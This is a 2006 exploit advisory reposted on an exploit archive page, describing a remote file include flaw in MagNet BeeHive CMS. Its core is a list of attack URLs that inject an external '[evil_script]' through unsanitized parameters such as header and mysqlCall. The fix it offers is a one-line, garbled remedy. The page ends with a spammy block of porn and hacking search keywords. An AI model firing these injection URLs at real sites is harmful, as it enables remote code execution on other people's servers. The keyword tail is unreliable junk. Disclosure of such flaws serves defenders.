about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , MagNet BeeHive CMS (header) Remote File Include Vulnerability




2006-06-25 MagNet BeeHive CMS (header) Remote File Include Vulnerability
Rated as : High Risk

---------------------------------------------------------------------------
Beehive CMS ([header]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ]
Remote : Yes
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Beehive CMS
version : latest version
URL : http://products.magnet-i.com/show/beehive/

------------------------------------------------------------------
Exploit:
~~~~~~~~

Variable $header not sanitized.When register_globals=on an attacker can
exploit this vulnerability with a simple php injection script.


#
http://www.site.com/[path]/conad/include/rootGui.inc.php?header=[evil_script]
#
http://www.site.com/[path]/conad/changeEmail.inc.php?mysqlCall=[evil_script]
#
http://www.site.com/[path]/conad/changeUserDetails.inc.php?mysqlCall=[evil_script]
#
http://www.site.com/[path]/conad/checkPasswd.inc.php?mysqlCall=[evil_script]
# http://www.site.com/[path]/conad/login.inc.php?mysqlCall=[evil_script]
# http://www.site.com/[path]/conad/logout.inc.php?mysqlCall=[evil_script]
#
http://www.site.com/[path]/include/listall.inc.php?mysqlcall=[evil_script]
# http://www.site.com/[path]/show/index.php?prefix=[evil_script]
#
http://www.site.com/[path]/conad/include/mysqlCall.inc.php?config=[evil_script]
# http://www.site.com/[path]/include/rootGui.inc.php?header=[evil_script]

---------------------------------------------------------------------------


Solution :
~~~~~~~~~~

declare variabel $header
---------------------------------------------------------------------------


Shoutz:
~~~~~~

# Special greetz to my good friend [Oo]
# To all members of h4cky0u.org ;) and Romanian Security Team [
hTTp://Romania.HackTECK.BE ]
---------------------------------------------------------------------------

*/

Contact:
~~~~~~~~
Nick: Kw3rLN
E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://Romania.HackTECK.BE & http://www.h4cky0u.org/
/*

-------------------------------- [ EOF]
----------------------------------


securitydot.net - 2006-06-25

Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 11:41:46 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
porn photo sexixxx.co www.gdwang Trisha sex www.sexcom WWW.SEKS/ www:gengbe Www.sexmal SERTA& sexi 4 AVAST web-shop.c www.lwhsto namitha se indianbebs free vedi 250wyt.cn/ iis4 www.8sxe.c tw18www se open ssh 3 phpBB++por phpbb+port 2003 explo tw18www se maxcpm.inf PHP Input/ Crack Data www.hlsm66 Banner php-nuke 2 2007 IE www.djv8.c adam www.yl8g.c Fucking.co yellow dog malay girl Wifesex co modifyform spuitkut Bigdick bangladesh sekss php-nuke 2 mpa pet Fotos de m MSN HACK xp book